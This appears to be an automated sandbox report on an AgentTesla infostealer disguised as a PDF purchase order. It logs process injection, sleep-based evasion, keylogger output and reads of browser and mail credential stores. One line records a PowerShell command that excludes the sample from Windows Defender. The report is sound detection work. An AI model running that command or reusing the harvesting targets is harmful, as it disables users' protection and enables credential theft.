                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396719Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396499Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396272Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395719Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395499Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399563Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398245Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398016Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397655Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397532Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397420Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397297Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397188Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396969Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394110Jump to behavior
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4456892035.0000000001145000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlljj
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory written: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory written: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory written: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess created: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q?<b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>{Win}r{Win}rTHbq N
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Time: 09/22/2024 15:04:10<br>User Name: user<br>Computer Name: 571345<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>{Win}r{Win}r
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q9<b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>{Win}rTHbq N
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q8<b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>{Win}THbq N
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Time: 09/22/2024 15:04:10<br>User Name: user<br>Computer Name: 571345<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>{Win}r{Win}rTe]ql
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\]qDTime: 09/22/2024 15:04:10<br>User Name: user<br>Computer Name: 571345<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>{Win}r{Win}r
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q3<b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q><b>[ Program Manager]</b> (04/07/2024 07:06:24)<br>{Win}r{Win}THbq N
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeQueries volume information: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeQueries volume information: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 6.2.ctsdvwT.exe.3fa9990.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.4344c70.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.42a9970.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.ctsdvwT.exe.4024710.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.42a9970.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.ctsdvwT.exe.4024710.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.ctsdvwT.exe.3fa9990.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.4344c70.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2167208545.0000000004024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2255092408.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2167208545.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2228074088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2014871271.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2255092408.0000000004344000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO-2024)bekotas.pdf.exe PID: 4440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 4332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 4612, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 2472, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
